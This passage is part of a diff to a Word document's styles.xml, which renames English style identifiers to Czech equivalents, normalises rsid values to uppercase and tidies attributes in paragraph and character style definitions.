+    <w:unhideWhenUsed/>
+  </w:style>
+  <w:style w:type="character" w:styleId="Hypertextovodkaz">
     <w:name w:val="Hyperlink"/>
     <w:uiPriority w:val="99"/>
     <w:rPr>
@@ -2802,38 +2897,37 @@
       <w:u w:val="single"/>
     </w:rPr>
   </w:style>
-  <w:style w:type="character" w:styleId="PageNumber">
+  <w:style w:type="character" w:styleId="slostrnky">
     <w:name w:val="page number"/>
-    <w:basedOn w:val="DefaultParagraphFont"/>
-    <w:rPr/>
-  </w:style>
-  <w:style w:type="character" w:styleId="FootnoteCharactersuser">
+    <w:basedOn w:val="Standardnpsmoodstavce"/>
+  </w:style>
+  <w:style w:type="character" w:customStyle="1" w:styleId="FootnoteCharactersuser">
     <w:name w:val="Footnote Characters (user)"/>
     <w:semiHidden/>
     <w:qFormat/>
-    <w:rsid w:val="00b50caa"/>
+    <w:rsid w:val="00B50CAA"/>
     <w:rPr>
       <w:vertAlign w:val="superscript"/>
     </w:rPr>
   </w:style>
-  <w:style w:type="character" w:styleId="FootnoteCharacters">
+  <w:style w:type="character" w:customStyle="1" w:styleId="FootnoteCharacters">
     <w:name w:val="Footnote Characters"/>
     <w:qFormat/>
     <w:rPr>
       <w:vertAlign w:val="superscript"/>
     </w:rPr>
   </w:style>
-  <w:style w:type="character" w:styleId="FootnoteReference">
+  <w:style w:type="character" w:styleId="Znakapoznpodarou">
     <w:name w:val="footnote reference"/>
     <w:rPr>
       <w:vertAlign w:val="superscript"/>
     </w:rPr>
   </w:style>
-  <w:style w:type="character" w:styleId="TextbublinyChar" w:customStyle="1">
+  <w:style w:type="character" w:customStyle="1" w:styleId="TextbublinyChar">
     <w:name w:val="Text bubliny Char"/>
-    <w:link w:val="BalloonText"/>
-    <w:qFormat/>
-    <w:rsid w:val="00350aec"/>
+    <w:link w:val="Textbubliny"/>
+    <w:qFormat/>
+    <w:rsid w:val="00350AEC"/>
     <w:rPr>
       <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
       <w:sz w:val="16"/>
@@ -2841,47 +2935,48 @@
       <w:lang w:val="en-US" w:eastAsia="en-US"/>
     </w:rPr>
   </w:style>
-  <w:style w:type="character" w:styleId="ZkladntextChar" w:customStyle="1">
+  <w:style w:type="character" w:customStyle="1" w:styleId="ZkladntextChar">
     <w:name w:val="Základní text Char"/>
-    <w:qFormat/>
-    <w:rsid w:val="0090541f"/>
+    <w:link w:val="Zkladntext"/>
+    <w:qFormat/>
+    <w:rsid w:val="0090541F"/>
     <w:rPr>
       <w:sz w:val="24"/>
       <w:szCs w:val="24"/>
       <w:lang w:eastAsia="en-US"/>
     </w:rPr>
   </w:style>
-  <w:style w:type="character" w:styleId="tmutatkiemels" w:customStyle="1">
+  <w:style w:type="character" w:customStyle="1" w:styleId="tmutatkiemels">
     <w:name w:val="Útmutató kiemelés"/>
     <w:qFormat/>
-    <w:rsid w:val="006f512e"/>
+    <w:rsid w:val="006F512E"/>
     <w:rPr>
       <w:b/>
       <w:bCs/>
     </w:rPr>
   </w:style>
-  <w:style w:type="character" w:styleId="tmutatfontos" w:customStyle="1">
+  <w:style w:type="character" w:customStyle="1" w:styleId="tmutatfontos">
     <w:name w:val="Útmutató fontos"/>
     <w:qFormat/>
-    <w:rsid w:val="006f512e"/>
+    <w:rsid w:val="006F512E"/>
     <w:rPr>
       <w:b/>
       <w:u w:val="single"/>
     </w:rPr>
   </w:style>
-  <w:style w:type="character" w:styleId="Irodalomjegyzkforrs" w:customStyle="1">
+  <w:style w:type="character" w:customStyle="1" w:styleId="Irodalomjegyzkforrs">
     <w:name w:val="Irodalomjegyzék forrás"/>
     <w:qFormat/>
-    <w:rsid w:val="006f512e"/>
+    <w:rsid w:val="006F512E"/>
     <w:rPr>
       <w:i/>
     </w:rPr>
   </w:style>
-  <w:style w:type="character" w:styleId="BookTitle">
+  <w:style w:type="character" w:styleId="Nzevknihy">
     <w:name w:val="Book Title"/>
     <w:uiPriority w:val="33"/>
     <w:qFormat/>
-    <w:rsid w:val="003f5425"/>
+    <w:rsid w:val="003F5425"/>
     <w:rPr>
       <w:b/>
       <w:bCs/>
@@ -2889,12 +2984,12 @@
       <w:spacing w:val="5"/>
     </w:rPr>
   </w:style>
-  <w:style w:type="character" w:styleId="VrazncittChar" w:customStyle="1">
+  <w:style w:type="character" w:customStyle="1" w:styleId="VrazncittChar">
     <w:name w:val="Výrazný citát Char"/>
-    <w:link w:val="IntenseQuote"/>
+    <w:link w:val="Vrazncitt"/>
     <w:uiPriority w:val="30"/>
     <w:qFormat/>
-    <w:rsid w:val="003f5425"/>
+    <w:rsid w:val="003F5425"/>
     <w:rPr>
       <w:b/>
       <w:bCs/>
@@ -2906,11 +3001,11 @@
       <w:lang w:eastAsia="en-US"/>
     </w:rPr>
   </w:style>
-  <w:style w:type="character" w:styleId="IntenseReference">
+  <w:style w:type="character" w:styleId="Odkazintenzivn">
     <w:name w:val="Intense Reference"/>
     <w:uiPriority w:val="32"/>
     <w:qFormat/>
-    <w:rsid w:val="003f5425"/>
+    <w:rsid w:val="003F5425"/>
     <w:rPr>
       <w:b/>
       <w:bCs/>
@@ -2920,42 +3015,42 @@
       <w:u w:val="single"/>
     </w:rPr>
   </w:style>
-  <w:style w:type="character" w:styleId="SubtleReference">
+  <w:style w:type="character" w:styleId="Odkazjemn">
     <w:name w:val="Subtle Reference"/>
     <w:uiPriority w:val="31"/>
     <w:qFormat/>
-    <w:rsid w:val="003f5425"/>
+    <w:rsid w:val="003F5425"/>
     <w:rPr>
       <w:smallCaps/>
       <w:color w:val="C0504D"/>
       <w:u w:val="single"/>
     </w:rPr>
   </w:style>
-  <w:style w:type="character" w:styleId="Emphasis">
+  <w:style w:type="character" w:styleId="Zdraznn">
     <w:name w:val="Emphasis"/>
     <w:qFormat/>
-    <w:rsid w:val="003f5425"/>
+    <w:rsid w:val="003F5425"/>
     <w:rPr>
       <w:i/>
       <w:iCs/>
     </w:rPr>
   </w:style>
-  <w:style w:type="character" w:styleId="SubtleEmphasis">
+  <w:style w:type="character" w:styleId="Zdraznnjemn">
     <w:name w:val="Subtle Emphasis"/>
     <w:uiPriority w:val="19"/>
     <w:qFormat/>
-    <w:rsid w:val="003f5425"/>
+    <w:rsid w:val="003F5425"/>
     <w:rPr>
       <w:i/>
       <w:iCs/>
       <w:color w:val="808080"/>
     </w:rPr>
   </w:style>
-  <w:style w:type="character" w:styleId="IntenseEmphasis">
+  <w:style w:type="character" w:styleId="Zdraznnintenzivn">
     <w:name w:val="Intense Emphasis"/>
     <w:uiPriority w:val="21"/>
     <w:qFormat/>
-    <w:rsid w:val="003f5425"/>
+    <w:rsid w:val="003F5425"/>
     <w:rPr>
       <w:b/>
       <w:bCs/>
@@ -2964,12 +3059,12 @@
       <w:color w:val="4F81BD"/>
     </w:rPr>
   </w:style>
-  <w:style w:type="character" w:styleId="CittChar" w:customStyle="1">
+  <w:style w:type="character" w:customStyle="1" w:styleId="CittChar">
     <w:name w:val="Citát Char"/>
-    <w:link w:val="Quote"/>
+    <w:link w:val="Citt"/>
     <w:uiPriority w:val="29"/>
     <w:qFormat/>
-    <w:rsid w:val="003f5425"/>
+    <w:rsid w:val="003F5425"/>
     <w:rPr>
       <w:i/>
       <w:iCs/>
@@ -2979,59 +3074,59 @@
       <w:lang w:eastAsia="en-US"/>
     </w:rPr>
   </w:style>
-  <w:style w:type="character" w:styleId="Strong">
+  <w:style w:type="character" w:styleId="Siln">
     <w:name w:val="Strong"/>
     <w:qFormat/>
-    <w:rsid w:val="003f5425"/>
+    <w:rsid w:val="003F5425"/>
     <w:rPr>
       <w:b/>
       <w:bCs/>
     </w:rPr>
   </w:style>
-  <w:style w:type="character" w:styleId="StyleUnderline" w:customStyle="1">
+  <w:style w:type="character" w:customStyle="1" w:styleId="StyleUnderline">
     <w:name w:val="Style Underline"/>
     <w:qFormat/>
-    <w:rsid w:val="00d07335"/>
+    <w:rsid w:val="00D07335"/>
     <w:rPr>
       <w:u w:val="single"/>
     </w:rPr>
   </w:style>
-  <w:style w:type="character" w:styleId="CommentReference">
+  <w:style w:type="character" w:styleId="Odkaznakoment">
     <w:name w:val="annotation reference"/>
-    <w:basedOn w:val="DefaultParagraphFont"/>
-    <w:qFormat/>
-    <w:rsid w:val="00630a92"/>
+    <w:basedOn w:val="Standardnpsmoodstavce"/>
+    <w:qFormat/>
+    <w:rsid w:val="00630A92"/>
     <w:rPr>
       <w:sz w:val="16"/>
       <w:szCs w:val="16"/>
     </w:rPr>
   </w:style>
-  <w:style w:type="character" w:styleId="TextkomenteChar" w:customStyle="1">
+  <w:style w:type="character" w:customStyle="1" w:styleId="TextkomenteChar">
     <w:name w:val="Text komentáře Char"/>
-    <w:basedOn w:val="DefaultParagraphFont"/>
-    <w:link w:val="CommentText"/>
-    <w:qFormat/>
-    <w:rsid w:val="00630a92"/>
+    <w:basedOn w:val="Standardnpsmoodstavce"/>
+    <w:link w:val="Textkomente"/>
+    <w:qFormat/>
+    <w:rsid w:val="00630A92"/>
     <w:rPr>
       <w:lang w:eastAsia="en-US"/>
     </w:rPr>
   </w:style>
-  <w:style w:type="character" w:styleId="PedmtkomenteChar" w:customStyle="1">
+  <w:style w:type="character" w:customStyle="1" w:styleId="PedmtkomenteChar">
     <w:name w:val="Předmět komentáře Char"/>
     <w:basedOn w:val="TextkomenteChar"/>
-    <w:link w:val="annotationsubject"/>
-    <w:qFormat/>
-    <w:rsid w:val="00630a92"/>
+    <w:link w:val="Pedmtkomente"/>
+    <w:qFormat/>
+    <w:rsid w:val="00630A92"/>
     <w:rPr>
       <w:b/>
       <w:bCs/>
       <w:lang w:eastAsia="en-US"/>
     </w:rPr>
   </w:style>
-  <w:style w:type="character" w:styleId="Nadpis1Char" w:customStyle="1">
+  <w:style w:type="character" w:customStyle="1" w:styleId="Nadpis1Char">
     <w:name w:val="Nadpis 1 Char"/>
-    <w:basedOn w:val="DefaultParagraphFont"/>
-    <w:link w:val="Heading1"/>
+    <w:basedOn w:val="Standardnpsmoodstavce"/>
+    <w:link w:val="Nadpis1"/>
     <w:uiPriority w:val="9"/>
     <w:qFormat/>
     <w:rsid w:val="00415288"/>
@@ -3045,12 +3140,12 @@
       <w:lang w:eastAsia="en-US"/>
     </w:rPr>
   </w:style>
-  <w:style w:type="character" w:styleId="Nadpis2Char" w:customStyle="1">
+  <w:style w:type="character" w:customStyle="1" w:styleId="Nadpis2Char">
     <w:name w:val="Nadpis 2 Char"/>
-    <w:basedOn w:val="DefaultParagraphFont"/>
-    <w:link w:val="Heading2"/>
-    <w:qFormat/>
-    <w:rsid w:val="000c3c29"/>
+    <w:basedOn w:val="Standardnpsmoodstavce"/>
+    <w:link w:val="Nadpis2"/>
+    <w:qFormat/>
+    <w:rsid w:val="000C3C29"/>
     <w:rPr>
       <w:rFonts w:cs="Arial"/>
       <w:b/>
@@ -3061,49 +3156,47 @@
       <w:lang w:val="en-US" w:eastAsia="en-US"/>
     </w:rPr>
   </w:style>
-  <w:style w:type="paragraph" w:styleId="Heading">
+  <w:style w:type="paragraph" w:customStyle="1" w:styleId="Heading">
     <w:name w:val="Heading"/>
-    <w:basedOn w:val="Normal"/>
-    <w:next w:val="BodyText"/>
-    <w:qFormat/>
-    <w:pPr>
-      <w:keepNext w:val="true"/>
-      <w:spacing w:before="240" w:after="120"/>
-    </w:pPr>
-    <w:rPr>
-      <w:rFonts w:ascii="Liberation Sans" w:hAnsi="Liberation Sans" w:eastAsia="Arial Unicode MS" w:cs="Arial Unicode MS"/>
+    <w:basedOn w:val="Normln"/>
+    <w:next w:val="Zkladntext"/>
+    <w:qFormat/>
+    <w:pPr>
+      <w:keepNext/>
+      <w:spacing w:before="240"/>
+    </w:pPr>
+    <w:rPr>
+      <w:rFonts w:ascii="Liberation Sans" w:eastAsia="Arial Unicode MS" w:hAnsi="Liberation Sans" w:cs="Arial Unicode MS"/>
       <w:sz w:val="28"/>
       <w:szCs w:val="28"/>
     </w:rPr>
   </w:style>
-  <w:style w:type="paragraph" w:styleId="BodyText">
+  <w:style w:type="paragraph" w:styleId="Zkladntext">
     <w:name w:val="Body Text"/>
-    <w:basedOn w:val="Normal"/>
+    <w:basedOn w:val="Normln"/>
     <w:link w:val="ZkladntextChar"/>
     <w:pPr>
-      <w:spacing w:before="360" w:after="120"/>
-      <w:ind w:hanging="0"/>
-    </w:pPr>
-    <w:rPr/>
-  </w:style>
-  <w:style w:type="paragraph" w:styleId="List">
+      <w:spacing w:before="360"/>
+      <w:ind w:firstLine="0"/>
+    </w:pPr>
+  </w:style>
+  <w:style w:type="paragraph" w:styleId="Seznam">
     <w:name w:val="List"/>
-    <w:basedOn w:val="BodyText"/>
-    <w:pPr/>
+    <w:basedOn w:val="Zkladntext"/>
     <w:rPr>
       <w:rFonts w:cs="Arial Unicode MS"/>
     </w:rPr>
   </w:style>
-  <w:style w:type="paragraph" w:styleId="Caption">
+  <w:style w:type="paragraph" w:styleId="Titulek">
     <w:name w:val="caption"/>
-    <w:basedOn w:val="Normal"/>
-    <w:next w:val="Normal"/>
+    <w:basedOn w:val="Normln"/>
+    <w:next w:val="Normln"/>
     <w:autoRedefine/>
     <w:qFormat/>
-    <w:rsid w:val="007a4231"/>
+    <w:rsid w:val="007A4231"/>
     <w:pPr>
       <w:spacing w:before="120" w:after="240"/>
-      <w:ind w:hanging="0"/>
+      <w:ind w:firstLine="0"/>
       <w:jc w:val="center"/>
     </w:pPr>
     <w:rPr>
@@ -3113,9 +3206,9 @@
       <w:szCs w:val="20"/>
     </w:rPr>
   </w:style>
-  <w:style w:type="paragraph" w:styleId="Index">
+  <w:style w:type="paragraph" w:customStyle="1" w:styleId="Index">
     <w:name w:val="Index"/>
-    <w:basedOn w:val="Normal"/>
+    <w:basedOn w:val="Normln"/>
     <w:qFormat/>
     <w:pPr>
       <w:suppressLineNumbers/>
@@ -3124,38 +3217,34 @@
       <w:rFonts w:cs="Arial Unicode MS"/>
     </w:rPr>
   </w:style>
-  <w:style w:type="paragraph" w:styleId="HeaderandFooter">
+  <w:style w:type="paragraph" w:customStyle="1" w:styleId="HeaderandFooter">
     <w:name w:val="Header and Footer"/>
-    <w:basedOn w:val="Normal"/>
-    <w:qFormat/>
-    <w:pPr/>
-    <w:rPr/>
-  </w:style>
-  <w:style w:type="paragraph" w:styleId="Header">
+    <w:basedOn w:val="Normln"/>
+    <w:qFormat/>
+  </w:style>
+  <w:style w:type="paragraph" w:styleId="Zhlav">
     <w:name w:val="header"/>
-    <w:basedOn w:val="Normal"/>
-    <w:rsid w:val="00c00b3c"/>
+    <w:basedOn w:val="Normln"/>
+    <w:rsid w:val="00C00B3C"/>
     <w:pPr>
       <w:tabs>
-        <w:tab w:val="clear" w:pos="720"/>
-        <w:tab w:val="center" w:pos="4320" w:leader="none"/>
-        <w:tab w:val="right" w:pos="8640" w:leader="none"/>
+        <w:tab w:val="center" w:pos="4320"/>
+        <w:tab w:val="right" w:pos="8640"/>
       </w:tabs>
-      <w:ind w:hanging="0"/>
-    </w:pPr>
-    <w:rPr/>
-  </w:style>
-  <w:style w:type="paragraph" w:styleId="Title">
+      <w:ind w:firstLine="0"/>
+    </w:pPr>
+  </w:style>
+  <w:style w:type="paragraph" w:styleId="Nzev">
     <w:name w:val="Title"/>
-    <w:basedOn w:val="Normal"/>
-    <w:next w:val="Subtitle"/>
+    <w:basedOn w:val="Normln"/>
+    <w:next w:val="Podnadpis"/>
     <w:autoRedefine/>
     <w:qFormat/>
-    <w:rsid w:val="00730b3c"/>
-    <w:pPr>
-      <w:keepNext w:val="true"/>
-      <w:spacing w:lineRule="auto" w:line="240"/>
-      <w:ind w:hanging="0"/>
+    <w:rsid w:val="00730B3C"/>
+    <w:pPr>
+      <w:keepNext/>
+      <w:spacing w:line="240" w:lineRule="auto"/>
+      <w:ind w:firstLine="0"/>
       <w:jc w:val="center"/>
     </w:pPr>
     <w:rPr>
@@ -3168,32 +3257,32 @@
       <w:szCs w:val="32"/>
     </w:rPr>
   </w:style>
-  <w:style w:type="paragraph" w:styleId="Cmlapszerz" w:customStyle="1">
+  <w:style w:type="paragraph" w:customStyle="1" w:styleId="Cmlapszerz">
     <w:name w:val="Címlap szerző"/>
-    <w:basedOn w:val="Normal"/>
+    <w:basedOn w:val="Normln"/>
     <w:autoRedefine/>
     <w:qFormat/>
     <w:rsid w:val="00171054"/>
     <w:pPr>
-      <w:keepNext w:val="true"/>
-      <w:spacing w:lineRule="auto" w:line="240" w:before="0" w:after="240"/>
-      <w:ind w:hanging="0"/>
+      <w:keepNext/>
+      <w:spacing w:after="240" w:line="240" w:lineRule="auto"/>
+      <w:ind w:firstLine="0"/>
       <w:jc w:val="center"/>
     </w:pPr>
     <w:rPr>
       <w:sz w:val="40"/>
     </w:rPr>
   </w:style>
-  <w:style w:type="paragraph" w:styleId="Subtitle">
+  <w:style w:type="paragraph" w:styleId="Podnadpis">
     <w:name w:val="Subtitle"/>
-    <w:basedOn w:val="Normal"/>
+    <w:basedOn w:val="Normln"/>
     <w:autoRedefine/>
     <w:qFormat/>
-    <w:rsid w:val="009c1c93"/>
+    <w:rsid w:val="009C1C93"/>
     <w:pPr>
       <w:keepLines/>
       <w:spacing w:before="120" w:after="4200"/>
-      <w:ind w:hanging="0"/>
+      <w:ind w:firstLine="0"/>
       <w:jc w:val="center"/>
     </w:pPr>
     <w:rPr>
@@ -3201,44 +3290,41 @@
       <w:sz w:val="32"/>
     </w:rPr>
   </w:style>
-  <w:style w:type="paragraph" w:styleId="Footer">
+  <w:style w:type="paragraph" w:styleId="Zpat">
     <w:name w:val="footer"/>
-    <w:basedOn w:val="Normal"/>
-    <w:rsid w:val="00c00b3c"/>
+    <w:basedOn w:val="Normln"/>
+    <w:rsid w:val="00C00B3C"/>
     <w:pPr>
       <w:tabs>
-        <w:tab w:val="clear" w:pos="720"/>
-        <w:tab w:val="center" w:pos="4320" w:leader="none"/>
-        <w:tab w:val="right" w:pos="8640" w:leader="none"/>
+        <w:tab w:val="center" w:pos="4320"/>
+        <w:tab w:val="right" w:pos="8640"/>
       </w:tabs>
-      <w:ind w:hanging="0"/>
-    </w:pPr>
-    <w:rPr/>
-  </w:style>
-  <w:style w:type="paragraph" w:styleId="TOC2">
+      <w:ind w:firstLine="0"/>
+    </w:pPr>
+  </w:style>
+  <w:style w:type="paragraph" w:styleId="Obsah2">
     <w:name w:val="toc 2"/>
-    <w:basedOn w:val="Normal"/>
-    <w:next w:val="Normal"/>
+    <w:basedOn w:val="Normln"/>
+    <w:next w:val="Normln"/>
     <w:autoRedefine/>
     <w:uiPriority w:val="39"/>
-    <w:rsid w:val="009c1c93"/>
-    <w:pPr>
-      <w:spacing w:before="0" w:after="0"/>
-      <w:ind w:hanging="0" w:start="238"/>
-    </w:pPr>
-    <w:rPr/>
-  </w:style>
-  <w:style w:type="paragraph" w:styleId="Nyilatkozatcm" w:customStyle="1">
+    <w:rsid w:val="009C1C93"/>
+    <w:pPr>
+      <w:spacing w:after="0"/>
+      <w:ind w:left="238" w:firstLine="0"/>
+    </w:pPr>
+  </w:style>
+  <w:style w:type="paragraph" w:customStyle="1" w:styleId="Nyilatkozatcm">
     <w:name w:val="Nyilatkozat cím"/>
-    <w:basedOn w:val="Normal"/>
-    <w:next w:val="Normal"/>
+    <w:basedOn w:val="Normln"/>
+    <w:next w:val="Normln"/>
     <w:autoRedefine/>
     <w:qFormat/>
     <w:pPr>
-      <w:keepNext w:val="true"/>
+      <w:keepNext/>
       <w:pageBreakBefore/>
-      <w:spacing w:before="0" w:after="640"/>
-      <w:ind w:hanging="0"/>
+      <w:spacing w:after="640"/>
+      <w:ind w:firstLine="0"/>
       <w:jc w:val="center"/>
     </w:pPr>
     <w:rPr>
@@ -3247,175 +3333,160 @@
       <w:sz w:val="36"/>
     </w:rPr>
   </w:style>
-  <w:style w:type="paragraph" w:styleId="Nyilatkozatkeltezs" w:customStyle="1">
+  <w:style w:type="paragraph" w:customStyle="1" w:styleId="Nyilatkozatkeltezs">
     <w:name w:val="Nyilatkozat keltezés"/>
     <w:basedOn w:val="Nyilatkozatszveg"/>
     <w:qFormat/>
-    <w:rsid w:val="00854bdc"/>
+    <w:rsid w:val="00854BDC"/>
     <w:pPr>
       <w:spacing w:before="240" w:after="960"/>
     </w:pPr>
-    <w:rPr/>
-  </w:style>
-  <w:style w:type="paragraph" w:styleId="TOC1">
+  </w:style>
+  <w:style w:type="paragraph" w:styleId="Obsah1">
     <w:name w:val="toc 1"/>
-    <w:basedOn w:val="Normal"/>
-    <w:next w:val="Normal"/>
+    <w:basedOn w:val="Normln"/>
+    <w:next w:val="Normln"/>
     <w:autoRedefine/>
     <w:uiPriority w:val="39"/>
-    <w:rsid w:val="00d1632f"/>
+    <w:rsid w:val="00D1632F"/>
     <w:pPr>
       <w:tabs>
-        <w:tab w:val="clear" w:pos="720"/>
-        <w:tab w:val="right" w:pos="8494" w:leader="dot"/>
+        <w:tab w:val="right" w:leader="dot" w:pos="8494"/>
       </w:tabs>
-      <w:spacing w:before="0" w:after="0"/>
-      <w:ind w:hanging="0"/>
+      <w:spacing w:after="0"/>
+      <w:ind w:firstLine="0"/>
     </w:pPr>
     <w:rPr>
       <w:b/>
     </w:rPr>
   </w:style>
-  <w:style w:type="paragraph" w:styleId="TOC3">
+  <w:style w:type="paragraph" w:styleId="Obsah3">
     <w:name w:val="toc 3"/>
-    <w:basedOn w:val="Normal"/>
-    <w:next w:val="Normal"/>
+    <w:basedOn w:val="Normln"/>
+    <w:next w:val="Normln"/>
     <w:autoRedefine/>
     <w:uiPriority w:val="39"/>
-    <w:rsid w:val="009c1c93"/>
-    <w:pPr>
-      <w:spacing w:before="0" w:after="0"/>
-      <w:ind w:hanging="0" w:start="482"/>
-    </w:pPr>
-    <w:rPr/>
-  </w:style>
-  <w:style w:type="paragraph" w:styleId="TOC4">
+    <w:rsid w:val="009C1C93"/>
+    <w:pPr>
+      <w:spacing w:after="0"/>
+      <w:ind w:left="482" w:firstLine="0"/>
+    </w:pPr>
+  </w:style>
+  <w:style w:type="paragraph" w:styleId="Obsah4">
     <w:name w:val="toc 4"/>
-    <w:basedOn w:val="Normal"/>
-    <w:next w:val="Normal"/>
+    <w:basedOn w:val="Normln"/>
+    <w:next w:val="Normln"/>
     <w:autoRedefine/>
     <w:semiHidden/>
-    <w:rsid w:val="009c1c93"/>
-    <w:pPr>
-      <w:spacing w:before="0" w:after="0"/>
-      <w:ind w:hanging="0" w:start="720"/>
-    </w:pPr>
-    <w:rPr/>
-  </w:style>
-  <w:style w:type="paragraph" w:styleId="TOC5">
+    <w:rsid w:val="009C1C93"/>
+    <w:pPr>
+      <w:spacing w:after="0"/>
+      <w:ind w:left="720" w:firstLine="0"/>
+    </w:pPr>
+  </w:style>
+  <w:style w:type="paragraph" w:styleId="Obsah5">
     <w:name w:val="toc 5"/>
-    <w:basedOn w:val="Normal"/>
-    <w:next w:val="Normal"/>
+    <w:basedOn w:val="Normln"/>
+    <w:next w:val="Normln"/>
     <w:autoRedefine/>
     <w:semiHidden/>
-    <w:rsid w:val="009c1c93"/>
-    <w:pPr>
-      <w:spacing w:before="0" w:after="0"/>
-      <w:ind w:hanging="0" w:start="958"/>
-    </w:pPr>
-    <w:rPr/>
-  </w:style>
-  <w:style w:type="paragraph" w:styleId="TOC6">
+    <w:rsid w:val="009C1C93"/>
+    <w:pPr>
+      <w:spacing w:after="0"/>
+      <w:ind w:left="958" w:firstLine="0"/>
+    </w:pPr>
+  </w:style>
+  <w:style w:type="paragraph" w:styleId="Obsah6">
     <w:name w:val="toc 6"/>
-    <w:basedOn w:val="Normal"/>
-    <w:next w:val="Normal"/>
+    <w:basedOn w:val="Normln"/>
+    <w:next w:val="Normln"/>
     <w:autoRedefine/>
     <w:semiHidden/>
-    <w:rsid w:val="009c1c93"/>
-    <w:pPr>
-      <w:spacing w:before="0" w:after="0"/>
-      <w:ind w:start="1202"/>
-    </w:pPr>
-    <w:rPr/>
-  </w:style>
-  <w:style w:type="paragraph" w:styleId="TOC7">
+    <w:rsid w:val="009C1C93"/>
+    <w:pPr>
+      <w:spacing w:after="0"/>
+      <w:ind w:left="1202"/>
+    </w:pPr>
+  </w:style>
+  <w:style w:type="paragraph" w:styleId="Obsah7">
     <w:name w:val="toc 7"/>
-    <w:basedOn w:val="Normal"/>
-    <w:next w:val="Normal"/>
+    <w:basedOn w:val="Normln"/>
+    <w:next w:val="Normln"/>
     <w:autoRedefine/>
     <w:semiHidden/>
     <w:pPr>
-      <w:ind w:start="1440"/>
-    </w:pPr>
-    <w:rPr/>
-  </w:style>
-  <w:style w:type="paragraph" w:styleId="TOC8">
+      <w:ind w:left="1440"/>
+    </w:pPr>
+  </w:style>
+  <w:style w:type="paragraph" w:styleId="Obsah8">
     <w:name w:val="toc 8"/>
-    <w:basedOn w:val="Normal"/>
-    <w:next w:val="Normal"/>
+    <w:basedOn w:val="Normln"/>
+    <w:next w:val="Normln"/>
     <w:autoRedefine/>
     <w:semiHidden/>
     <w:pPr>
-      <w:ind w:start="1680"/>
-    </w:pPr>
-    <w:rPr/>
-  </w:style>
-  <w:style w:type="paragraph" w:styleId="TOC9">
+      <w:ind w:left="1680"/>
+    </w:pPr>
+  </w:style>
+  <w:style w:type="paragraph" w:styleId="Obsah9">
     <w:name w:val="toc 9"/>
-    <w:basedOn w:val="Normal"/>
-    <w:next w:val="Normal"/>
+    <w:basedOn w:val="Normln"/>
+    <w:next w:val="Normln"/>
     <w:autoRedefine/>
     <w:semiHidden/>
     <w:pPr>
-      <w:ind w:start="1920"/>
-    </w:pPr>
-    <w:rPr/>
-  </w:style>
-  <w:style w:type="paragraph" w:styleId="Irodalomjegyzksor" w:customStyle="1">
+      <w:ind w:left="1920"/>
+    </w:pPr>
+  </w:style>
+  <w:style w:type="paragraph" w:customStyle="1" w:styleId="Irodalomjegyzksor">
     <w:name w:val="Irodalomjegyzék sor"/>
-    <w:basedOn w:val="Normal"/>
+    <w:basedOn w:val="Normln"/>
     <w:autoRedefine/>
     <w:qFormat/>
-    <w:rsid w:val="00b96880"/>
+    <w:rsid w:val="00B96880"/>
     <w:pPr>
       <w:numPr>
-        <w:ilvl w:val="0"/>
         <w:numId w:val="2"/>
       </w:numPr>
       <w:tabs>
-        <w:tab w:val="clear" w:pos="720"/>
-        <w:tab w:val="left" w:pos="567" w:leader="none"/>
+        <w:tab w:val="left" w:pos="567"/>
       </w:tabs>
-      <w:spacing w:lineRule="auto" w:line="240" w:before="120" w:after="240"/>
-      <w:ind w:hanging="567" w:start="567"/>
-      <w:jc w:val="start"/>
-    </w:pPr>
-    <w:rPr/>
-  </w:style>
-  <w:style w:type="paragraph" w:styleId="FootnoteText">
+      <w:spacing w:before="120" w:after="240" w:line="240" w:lineRule="auto"/>
+      <w:ind w:left="567" w:hanging="567"/>
+      <w:jc w:val="left"/>
+    </w:pPr>
+  </w:style>
+  <w:style w:type="paragraph" w:styleId="Textpoznpodarou">
     <w:name w:val="footnote text"/>
-    <w:basedOn w:val="Normal"/>
+    <w:basedOn w:val="Normln"/>
     <w:semiHidden/>
-    <w:rsid w:val="00b50caa"/>
-    <w:pPr/>
+    <w:rsid w:val="00B50CAA"/>
     <w:rPr>
       <w:sz w:val="20"/>
       <w:szCs w:val="20"/>
     </w:rPr>
   </w:style>
-  <w:style w:type="paragraph" w:styleId="Fejezetcimszmozsnlkl" w:customStyle="1">
+  <w:style w:type="paragraph" w:customStyle="1" w:styleId="Fejezetcimszmozsnlkl">
     <w:name w:val="Fejezetcim számozás nélkül"/>
-    <w:basedOn w:val="Heading1"/>
-    <w:next w:val="Normal"/>
-    <w:qFormat/>
-    <w:rsid w:val="00d1632f"/>
+    <w:basedOn w:val="Nadpis1"/>
+    <w:next w:val="Normln"/>
+    <w:qFormat/>
+    <w:rsid w:val="00D1632F"/>
     <w:pPr>
       <w:numPr>
-        <w:ilvl w:val="0"/>
         <w:numId w:val="0"/>
       </w:numPr>
-      <w:spacing w:before="240" w:after="480"/>
+      <w:spacing w:before="240"/>
       <w:ind w:firstLine="720"/>
     </w:pPr>
-    <w:rPr/>
-  </w:style>
-  <w:style w:type="paragraph" w:styleId="Source" w:customStyle="1">
+  </w:style>
+  <w:style w:type="paragraph" w:customStyle="1" w:styleId="Source">
     <w:name w:val="Source"/>
-    <w:basedOn w:val="Normal"/>
+    <w:basedOn w:val="Normln"/>
     <w:autoRedefine/>
     <w:qFormat/>
     <w:pPr>
-      <w:keepNext w:val="true"/>
+      <w:keepNext/>
       <w:pBdr>
         <w:top w:val="single" w:sz="8" w:space="1" w:color="000000"/>
         <w:left w:val="single" w:sz="8" w:space="4" w:color="000000"/>
@@ -3423,22 +3494,22 @@
         <w:right w:val="single" w:sz="8" w:space="4" w:color="000000"/>
       </w:pBdr>
       <w:shd w:val="clear" w:color="auto" w:fill="D9D9D9"/>
-      <w:spacing w:lineRule="auto" w:line="240"/>
-      <w:ind w:hanging="0"/>
+      <w:spacing w:line="240" w:lineRule="auto"/>
+      <w:ind w:firstLine="0"/>
     </w:pPr>
     <w:rPr>
       <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
       <w:sz w:val="20"/>
     </w:rPr>
   </w:style>
-  <w:style w:type="paragraph" w:styleId="BalloonText">
+  <w:style w:type="paragraph" w:styleId="Textbubliny">
     <w:name w:val="Balloon Text"/>
-    <w:basedOn w:val="Normal"/>
+    <w:basedOn w:val="Normln"/>
     <w:link w:val="TextbublinyChar"/>
     <w:qFormat/>
-    <w:rsid w:val="00350aec"/>
-    <w:pPr>
-      <w:spacing w:lineRule="auto" w:line="240"/>
+    <w:rsid w:val="00350AEC"/>
+    <w:pPr>
